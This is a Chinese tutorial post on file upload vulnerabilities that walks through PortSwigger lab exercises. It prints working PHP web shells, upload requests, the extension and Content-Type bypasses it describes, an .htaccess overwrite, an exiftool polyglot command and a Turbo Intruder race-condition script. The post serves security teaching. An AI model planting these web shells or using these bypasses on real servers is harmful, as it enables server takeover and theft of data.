欢迎关注订阅专栏!
WEB安全系列包括如下三个专栏:

  • 《WEB安全基础-服务器端漏洞》
  • 《WEB安全基础-客户端漏洞》
  • 《WEB安全高级-综合利用》

知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路!
欢迎关注订阅专栏!

  • 专栏文章追求对知识点的全面总结,逻辑严密,方便学习掌握。力求做到看完一篇文章,掌握一类漏洞知识。让读者简洁高效的掌握WEB安全知识框架,推开入门深造的大门。
  • 绝不为了追求文章数量,彰显内容丰富而故意拆散相关知识点。避免读者沉迷在无尽的技巧中而迷失进阶的道路!本系列的目标是授之以渔,而不仅仅是技巧的堆砌。
  • 每篇文章均配有大量靶场,点击文章中靶场名即可跳转练习(靶场在网站注册即可免费使用)。
  • 欢迎订阅专栏!建议学完两个基础专栏,再学习高级哦~

WEB安全基础入门—文件上传漏洞

  • 1. 什么是文件上传漏洞
  • 2. 文件上传漏洞的影响
    • 1.该漏洞可使用的必要条件
    • 2. 漏洞影响
  • 3. Web服务器对访问静态文件的常规处理
  • 4. 利用文件上传来部署Web shell
  • 5. 上传漏洞利用
    • 1. 有缺陷的文件类型验证
    • 2. 阻止用户在可访问的目录中执行文件
    • 3. 文件类型验证采用黑名单的不足
    • 4. 对文件内容验证的缺陷
    • 5. 利用条件竞争上传文件
  • 6. 在无法执行远程代码的情况下利用文件上载漏洞
  • 7. 通过PUT方法上传文件
  • 8. 漏洞实例
    • 1. 上传Web shell远程代码执行([Remote code execution via web shell upload](https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload))
    • 2. 通过绕过内容类型限制上载Web shell([Web shell upload via Content-Type restriction bypass](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass))
    • 3. 通过路径遍历漏洞上传Web shell([Web shell upload via path traversal](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-path-traversal))
    • 4. 绕过黑名单上传Web shell([Web shell upload via extension blacklist bypass](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-extension-blacklist-bypass))
    • 5. 通过模糊文件扩展名上传Web shell([Web shell upload via obfuscated file extension](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-obfuscated-file-extension))
    • 6. 绕过内容检测上传web shell([Remote code execution via polyglot web shell upload](https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload))
    • 7. 通过争用条件上传Web shell([Web shell upload via race condition](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-race-condition))

1. 什么是文件上传漏洞

文件上传漏洞指缺失或可绕过对拟上传文件的名字、类型、内容或大小进行验证。导致实际可上传恶意文件,如脚本或木马。造成远程命令执行、敏感信息泄露等危害。

  • 上传文件本身造成危害
  • 后续HTTP请求上传的文件,同时服务器端允许执行该类型脚本,从而造成危害。

2. 文件上传漏洞的影响

1.该漏洞可使用的必要条件

  • 对上传文件验证存在缺陷(文件名字、类型、内容或大小)
  • 上传后是否可知文件存储路径
  • 上传后服务器是否可执行该类型文件

2. 漏洞影响

  • 若后台允许执行某类型文件,可上传该类型的Web shell,尝试远程代码执行,拿下服务器权限。
  • 若后台对文件名验证有缺陷,可上传与重要文件名相同的文件,尝试覆盖原文件。
  • 若后台对文件大小验证有缺陷,可导致DoS攻击,造成大量磁盘空间消耗。

3. Web服务器对访问静态文件的常规处理

目前,网站大量使用动态页面,这些访问路径与实际的文件存储路径没有直接关系。但是对样式表(stylesheets)、图片等类型的静态资源访问,路径还是一样。
服务器从请求中识别出文件后缀类型。将扩展名和MIME与预制好的文件类型白名单(或黑名单)进行比对。命中名单后,执行不同的操作,大致分为三类:

  • 白名单设定文件类型不可执行,如图片、HTML页面。服务器将文件内容放到响应中返回。
  • 白名单设定文件类型可执行,同时实际服务器配置也可执行,如PHP文件。服务器解析请求中的请求头、请求参数,传入脚本运行。将运行结果放到响应中返回。
  • 白名单设定文件类型可执行,但服务器配置不满足。服务器会产生错误响应。有时错误响应存在源代码泄露等情况

在响应头中,Content-Type会提供服务器支持的文件类型。如没有该头部,则应用使用文件扩展名MIME类型映射表。

4. 利用文件上传来部署Web shell

最好的情况是,网站允许上传任意脚本,如PHP\JAVA\PYTHON文件,并且被当做代码执行。这种情况下,可制作Web shell进行上传攻击。

Web shell是一种恶意脚本,上传后,攻击者只需向设定好的端点(通常是该文件存储位置)发送HTTP请求,即可在远程Web服务器上执行任意命令。

若能成功上传Web shell,则意味着已拥有对服务器的完全控制。可以读写任意文件、窃取敏感数据,甚至使用服务器转移针对内部基础设施和网络外部其他服务器的攻击。举例如下

<?php echo file_get_contents('/path/to/target/file'); ?>

上传后,对此文件存储位置发送请求,将在响应中返回目标文件的内容。

<?php echo system($_GET['command']); ?>
通过参数调用使用该shell
GET /example/exploit.php?command=id HTTP/1.1

例题 1

5. 上传漏洞利用

1. 有缺陷的文件类型验证

一般HTML表格,采用post数据包,文件格式application/x-www-form-url-encoded即可。但是如有图片或PDF等需二进制传送的内容,文件格式使用multipart/form-data
在一个表单中包括上传头像照片、个人描述、用户名三部分内容,常规数据包如下:

POST /images HTTP/1.1
Host: normal-website.com
Content-Length: 12345
Content-Type: multipart/form-data; boundary=---------------------------012345678901234567890123456---------------------------012345678901234567890123456
Content-Disposition: form-data; name="image"; filename="example.jpg"
Content-Type: image/jpeg                         (头像照片)[...binary content of example.jpg...]---------------------------012345678901234567890123456
Content-Disposition: form-data; name="description"   (个人描述)This is an interesting description of my image.---------------------------012345678901234567890123456
Content-Disposition: form-data; name="username"      (用户名)wiener
---------------------------012345678901234567890123456--

如网站验证特定类型文件时,若仅验证Content-Type,我们可拦截数据包,直接修改该值即可绕过验证。

例题2

2. 阻止用户在可访问的目录中执行文件

在上述第1道验证文件类型的防线后,网站往往还采取禁止用户在访问到的文件上传路径区域执行任何脚本的限制。
往往在配置中将此区域能执行的脚本,直接规定出来。并对其他脚本的请求,返回错误信息。有时错误信息是将恶意脚本内容直接返回。

GET /static/exploit.php?command=id HTTP/1.1
Host: normal-website.comHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 39<?php echo system($_GET['command']); ?>

后端对不同区域的限制往往不同,用户上传区域最为严格。攻击者若能将文件上传至其他防护宽松的路径处,可能成功执行脚本。
数据请求包中字段multipart/form-datafilename往往决定文件名和影响存储路径。

例题 3

3. 文件类型验证采用黑名单的不足

如果采用黑名单形式来验证文件类型,黑名单会被各种方式绕过。例如黑名单写明禁止.php 类型,但是后缀改为,.php3.php4.php5.phtml.php可绕过黑名单,文件一样会被当做PHP来执行。

  • 恶意覆盖服务器配置

一般服务器是根据配置文件,来决定什么类型的文件可被执行。例如在linux上的apache配置文件/etc/apache2/apache2.conf中,设置PHP为可执行文件。

LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php

或者

<FilesMatch "lx1">   //文件名包含"lx1"的文件可按PHP文件执行
SetHandler application/x-httpd-php
</FilesMatch>

在一个目录中有配置文件.htaccess存在。则服务器在该目录下,优先于全局配置,执行此配置文件设置。
**在Windows上的IIS服务,**文件web.config配置如下命令,可允许向用户返回json文件。

<staticContent><mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>

攻击者编制配置文件,使定制的后缀名映射到服务器可执行文件,然后尝试上传该文件(部分网站可上传),覆盖掉服务器原文件。

例题 4

  • 扩展名模糊绕混淆过技巧

    • 大小写混淆.pHp
    • 多重扩展名 .php.jpg
    • 多重.绕过 .php.
    • .URL编码绕过 exploit%2Ephp
    • 分号或URL编码空字符绕过 .asp;.jpg .asp%00.jpg
    • 多字节Unicode字符绕过 xC0 x2E xC4 xAE xC0 xAE可能均会转化为x2E
    • 复写扩展名 .p.phphp 中部的.php被过滤掉,剩余的字符串依然组成.php

例题 5

4. 对文件内容验证的缺陷

除了对文件扩展名进行检测外,一些防护较好的服务器还对文件内容进行检测。检测的方式有多种。

  • 对字段类型检测Content-Type
  • 对文件开头和结尾的十六进制数检测

  • 对特定类型文件的固有属性进行检测,如图片一定有尺寸大小的属性。可采取图片马方式绕过。

图片马的绕过方式主要是4种,但核心是一样的。将攻击荷载加载进图片文件中,满足类型检测、文件开头或结尾十六进制检测、特定类型文件固有属性检测。

  1. 文本方式打开正常图片,在末尾粘结一句话木马(会有一定概率失败,一句话木马被破坏)
  2. 准备一个正常图片1.jpg,一个木马文件2.php。生成目标图片马3.jpg

cmd中执行命令: copy 1.jpg/b+2.php 3.jpg

  1. 16进制打开图片在末尾添加一句话木马
  2. 使用工具ExifTool制作图片马Github下载地址

除了上述方式外,还需要一个必须条件,服务器存在类似任意文件包含漏洞,导致可执行jpg等图片文件(图片马)。

方法4 工具ExifTool 可直接将图片马变为.php直接上传,只要服务器能执行php文件即可。

例题 6

5. 利用条件竞争上传文件

目前流行的主流框架,对上述攻击都有有效防御。通常是将刚刚上传的文件临时迁移到类似于沙箱环境路径下,并修改为随机文件名(避免覆盖和路径预测)。一旦文件进入沙箱环境将很难进行下一步攻击测试。
但是这种处理方式往往是在框架外,采用独立的流程进行处理。 这不仅相当复杂,而且还可能引入危险的争用条件,使攻击者能够完全绕过所有验证。
举例来说, 有些网站文件上传后,会将文件移至沙箱,用于检测病毒或恶意软件,并将源上传文件删除。但这个转义存储和删除源文件的过程需要几毫秒。这极短的时间,攻击者可以配合工具尝试进行利用(工具:Burp Turbo 扩展)。

条件竞争漏洞利用非常巧妙,也非常有难度。往往需要事先获取部分源码,通过源代码审计发现疑似利用点,并经大量测试才能成功。

例题 7

  • 基于URL的条件竞争

服务器必须通过互联网获取文件并创建本地副本,然后才能执行任何验证。
由于文件是使用HTTP加载的,因此开发人员无法使用框架机制来安全地验证文件。只能手动创建自己的进程来临时存储和验证文件,产生随机名称存放在临时目录中。
如果随机目录名是使用伪随机函数(如PHP的uniqid())生成的,则可用暴力破解测试的。
要想利用,可以尝试延长处理文件所需的时间,从而延长暴力破解目录的时间窗口。做到这一点的一种方法是上传一个非常大的文件来延长传输处理时间。如果它是分块处理的,该恶意文件的开头带有有效负载,后可跟大量的任意填充字节。

6. 在无法执行远程代码的情况下利用文件上载漏洞

尽管无法在服务器上执行脚本,但可以上载客户端攻击的脚本。例如,可以上传HTML文件或SVG图像,可以使用

需考虑同源策略的限制

7. 通过PUT方法上传文件

一些Web服务器可能被配置为支持PUT请求。如果没有适当的防御措施,这就成为一种上传恶意文件的替代方法,即使在网络界面上没有上传功能时也是如此。
PUT /images/exploit.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 49<?php echo file_get_contents('/path/to/file'); ?>

8. 漏洞实例

1. 上传Web shell远程代码执行(Remote code execution via web shell upload)

利用基础PHP web shell读取文件/home/carlos/secret内容
测试账号wiener:peter,该网站对上传无任何防护

本地制作php web shell 123.php
<?php echo file_get_contents('/home/carlos/secret'); ?>
再次刷新个人主页,发现数据包
GET /files/avatars/123.php HTTP/1.1响应内容为flag

2. 通过绕过内容类型限制上载Web shell(Web shell upload via Content-Type restriction bypass)

利用基础PHP web shell读取文件/home/carlos/secret内容
测试账号wiener:peter

  • 截图思路

    1. 登陆账号,正常上传图片测试流程,发现数据包POST /my-account/avatar
    2. 放到repeater模块,尝试上传web shell(与上题相同)。发现报错,信息显示文件格式不对,仅支持image/png image/jpg
    3. 尝试修改content-type字段,再次上传成功。
-----------------------------396512672126764604443828361850
Content-Disposition: form-data; name="avatar"; filename="123.php"
Content-Type: image/png<?php echo file_get_contents('/home/carlos/secret'); ?>

3. 通过路径遍历漏洞上传Web shell(Web shell upload via path traversal)

利用基础PHP web shell读取文件/home/carlos/secret内容
测试账号wiener:peter

  • 截图思路

    1. 关键不同点,注意filename=../123.php。观察回复,发现…/被过滤
-----------------------------28360212211975207492478525821
Content-Disposition: form-data; name="avatar"; filename="../123.php"
Content-Type: text/php
The file avatars/123.php has been uploaded.<p>
  1. 尝试URL编码/可否绕过过滤
-----------------------------28360212211975207492478525821
Content-Disposition: form-data; name="avatar"; filename="..%2f123.php"
Content-Type: text/php
The file avatars/../123.php has been uploaded.<p>

成功。

4. 绕过黑名单上传Web shell(Web shell upload via extension blacklist bypass)

利用基础PHP web shell读取文件/home/carlos/secret内容
测试账号wiener:peter

  • 截图思路

    1. 经测试后,发现.php被拦截无法上传。同时后端服务器为

Apache/2.4.41 (Ubuntu) Server at 172.17.0.4 Port 80

  1. 尝试覆盖上传.htaccess配置文件,自定制扩展按php执行文件。修改数据包POST /my-account/avatar
-----------------------------1606875978792719522141999998
Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: text/plainAddType application/x-httpd-php .heason
  1. 再次上传web shell(扩展名改为.heason)成功
-----------------------------1606875978792719522141999998
Content-Disposition: form-data; name="avatar"; filename="123.heason"
Content-Type: text/php<?php echo file_get_contents('/home/carlos/secret'); ?>

5. 通过模糊文件扩展名上传Web shell(Web shell upload via obfuscated file extension)

利用基础PHP web shell读取文件/home/carlos/secret内容
测试账号wiener:peter

  • 截图思路

    1. 多次测试后456.php%00.jpg可绕过。
    2. 注意,上传成功后,需手动访问文件路径 GET /files/avatars/456.php查看响应获取结果

6. 绕过内容检测上传web shell(Remote code execution via polyglot web shell upload)

利用基础PHP web shell读取文件/home/carlos/secret内容
测试账号wiener:peter

./exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

在图片描述中添加一句话木马,描述以STATE开头,END结尾(方便最后搜索),生成php文件上传,虽是php文件,但就是能绕过内容检测,工具很实用。

  1. 生成polyglot.php直接上传
  2. 访问路径GET /files/avatars/polyglot.php
  3. 在返回的乱码中,搜索START,START与END之间即为获取的信息

7. 通过争用条件上传Web shell(Web shell upload via race condition)

利用基础PHP web shell读取文件/home/carlos/secret内容
测试账号wiener:peter,工具使用Burp Turbo 扩展
部分源码如下,(注意注释文字)

/*上传的文件被移动到一个可访问的文件夹,在那里它被检查是否有病毒。只有在病毒检查完成后,才会删除恶意文件。这意味着在删除文件之前,可以在较小的时间窗口内执行该文件。
*/
<?php$target_dir = "avatars/";
$target_file = $target_dir . $_FILES["avatar"]["name"];
// temporary move  上传的源文件被转移存储在临时可访问路径
move_uploaded_file($_FILES["avatar"]["tmp_name"], $target_file);if (checkViruses($target_file) && checkFileType($target_file)) {echo "The file ". htmlspecialchars( $target_file). " has been uploaded.";
} else {// 问题就出现在上面这一行,是在完成检测后,发现有问题才会删除文件unlink($target_file);  echo "Sorry, there was an error uploading your file.";http_response_code(403);
}function checkViruses($fileName) {// checking for viruses...}function checkFileType($fileName) {$imageFileType = strtolower(pathinfo($fileName,PATHINFO_EXTENSION));if($imageFileType != "jpg" && $imageFileType != "png") {echo "Sorry, only JPG & PNG files are allowed\n";return false;} else {return true;}
}
?>
  • 截图思路

    1. 使用测试账户完整熟悉头像交互全流程。发现上述介绍的所有攻击方式均失效。查看源码,考虑使用条件竞争漏洞。
    2. 关注两个数据包POST /my-account/avatar GET /files/avatars/1.png
    3. 使用Burp Turbo 扩展,python脚本模板如下
def queueRequests(target, wordlists):engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)request1 = '''<YOUR-POST-REQUEST>''' # POST /my-account/avatarrequest2 = '''<YOUR-GET-REQUEST>'''  # GET /files/avatars/heason.php# the 'gate' argument blocks the final byte of each request until openGate is invokedengine.queue(request1, gate='race1')for x in range(5):engine.queue(request2, gate='race1')# wait until every 'race1' tagged request is ready# then send the final byte of each request# (this method is non-blocking, just like queue)engine.openGate('race1')engine.complete(timeout=60)def handleResponse(req, interesting):table.add(req)
  1. 准备好攻击脚本heason.php正常数据包上传,被拒。请求包作为 查看该文件GET包作为 构造攻击脚本
def queueRequests(target, wordlists):engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)request1 = '''POST /my-account/avatar HTTP/1.1Host: 0adc00f904771650c0a69f33000200fc.web-security-academy.netCookie: session=cj7XIiuLDzxPx2HeGcn2UQA2WP8u3vniUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------208961071423304880663648965172Content-Length: 550Origin: https://0adc00f904771650c0a69f33000200fc.web-security-academy.netReferer: https://0adc00f904771650c0a69f33000200fc.web-security-academy.net/my-accountUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------208961071423304880663648965172Content-Disposition: form-data; name="avatar"; filename="heason.php"Content-Type: application/octet-stream<?php echo file_get_contents('/home/carlos/secret'); ?>-----------------------------208961071423304880663648965172Content-Disposition: form-data; name="user"wiener-----------------------------208961071423304880663648965172Content-Disposition: form-data; name="csrf"OfvXiGdCGXG9Y4C3aGj9cbPgSWITTAOA-----------------------------208961071423304880663648965172--'''request2 = '''GET /files/avatars/heason.php HTTP/1.1Host: 0adc00f904771650c0a69f33000200fc.web-security-academy.netCookie: session=cj7XIiuLDzxPx2HeGcn2UQA2WP8u3vniUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: image/avif,image/webp,*/*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: https://0adc00f904771650c0a69f33000200fc.web-security-academy.net/my-accountSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-originIf-Modified-Since: Sun, 05 Jun 2022 23:35:24 GMTIf-None-Match: "c52c-5e0bbcf47f78a"Te: trailersConnection: close'''# the 'gate' argument blocks the final byte of each request until openGate is invokedengine.queue(request1, gate='race1')for x in range(5):engine.queue(request2, gate='race1')# wait until every 'race1' tagged request is ready# then send the final byte of each request# (this method is non-blocking, just like queue)engine.openGate('race1')engine.complete(timeout=60)def handleResponse(req, interesting):table.add(req)
  1. 结果如下,成功

一级必杀,防不胜防的漏洞,WEB安全基础入门—文件上传漏洞相关推荐

  1. fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御

    一.编辑器漏洞 1.编辑器 编辑器属于第三方软件,它的作用是方便网站管理员上传或编辑网站上的内容,类似我们电脑上的Word文档. 编辑器通常分为两种情况: (1) 不需要后台验证,可以直接在前台访问且 ...

  2. 织梦guestbook.php漏洞,DEDE:织梦漏洞修复(含任意文件上传漏洞与注入漏洞)

    这几天阿里频繁提醒网站有漏洞,搞得我不胜其烦,好吧,我修复还不行吗?搜索之后整理如下,仅供参考(5.7以上版本适用): 任意文件上传漏洞修复 一./include/dialog/select_soft ...

  3. struts2 ajax上传文件 file空_WordPress插件漏洞分析:WPDiscuz任意文件上传漏洞

    写在前面的话 就在不久之前,Wordfence的威胁情报团队在一款名叫wpDiscuz的Wordpress评论插件中发现了一个高危漏洞,而这款插件目前已有超过80000个网站在使用了.这个漏洞将允许未 ...

  4. html 编辑器编码漏洞,某富文本编辑器文件上传漏洞(小论如何控制IsPostBack的值) | CN-SEC 中文网...

    在这个文本编辑器上没有找到任何按钮是可以直接上传文件的(只有插入文件上传按钮,没啥用),但是代码里面是隐藏有这样一个功能的: code 区域 protected override void Rende ...

  5. kindeditor php 漏洞,kindeditor=4.1.5 文件上传漏洞 | CN-SEC 中文网

    摘要 漏洞存在于 kindeditor 编辑器里,你能上传. txt 和. html 文件,支持 php/asp/jsp/asp.net 漏洞存在于 kindeditor 编辑器里,你能上传. txt ...

  6. uploadify.php 漏洞,PhotoStore “uploadify.php”任意文件上传漏洞

    发布日期:2014-01-08 更新日期:2014-01-12 受影响系统: ktools PhotoStore 4.0.7 描述: --------------------------------- ...

  7. 文件上传漏洞ED01-CMS v20180505 存在任意文件上传漏洞

    进入登陆页面我们弱口令admin:admin登录成功: 登录后我们进入user目录上传图片: 我们上传shell.png,抓包修改为shell.php; <?php system($_GET(1 ...

  8. web安全之文件上传漏洞攻击与防范方法

    一. 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行.这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等.这种攻击方式是最为直接和有效 ...

  9. web渗透之文件上传漏洞

    目录 一.原理 二.利用方式 三.文件上传的风险处 四.文件上传漏洞的危害 五.文件上传漏洞常见的绕过方式 1.前端绕过检测 2.mime类型检测绕过 3.黑名单绕过 (1).相似扩展名 (2).ap ...

  10. 文件上传漏洞-原理篇

    目录 第1章 文件上传漏洞基础 1.1 漏洞概述 1.2 漏洞成因 1.3 漏洞危害 1.4 漏洞利用姿势 第2章 文件上传漏洞检测与绕过 2.1 前端检测和绕过 2.2 服务器端检测和绕过 第3章 ...

最新文章

  1. Day 33 并发编程3
  2. inline-block空隙怎么解决
  3. mysql isreg_`Innodb` MySQL中如何优雅的删除大表跑路
  4. git服务器查看用户信息,git 查看当前git用户_新Git用户使用方法
  5. opengl实现3d点云_3D视觉CV界的终极体现形式,计算机如何「看」这个三维世界
  6. 实战Nginx与PHP(FastCGI)的安装、配置与优化
  7. MySQL处理中文乱码问题
  8. Windows Powershell的一些常规操作命令
  9. 吴恩达 matlab,吴恩达机器学习记录--Matlab 一些基本操作
  10. oracle pid查看,查看佔用aix oracle pid
  11. Oracle 11gR2 GI日常管理手册
  12. 今天的雪糕格外好吃!
  13. 门户通专访草根站长九天狼:做站贵在坚持
  14. bubblesort java,算法bubbleSort()
  15. Camera:双目成像原理
  16. CyberArk被评为2021年Gartner特权访问管理魔力象限的领导者
  17. scipy.misc.imresize的替换方案
  18. 实现Gmail邮箱翻转效果之开篇
  19. 怎么搭建在线网校系统,靠谱的网校平台搭建开发公司
  20. 数据库:PostgreSQL 和 MySQL对比

热门文章

  1. eclipse汉化版的问题
  2. 21天学通java不好_21天学通Java_怎么样学好Java,学Java-IT培训网
  3. 欧姆龙PLC数据读写工具。 支持FinsTCP实测好用打开欧姆龙PLC读写软件,输入IP地址和端口号
  4. 小米路由器r3d 安装vsftp 记事
  5. PDF中批量数据的提取与处理
  6. KELL 平台 DM9000驱动
  7. 简易呼吸灯c语言程序,51单片机(呼吸灯)C语言版
  8. java/php/net/pythont物流配送中心管理系统设计
  9. 基于.net的学校图书管理系统
  10. 简单 黑苹果dsdt教程_DSDT完美睡眠教程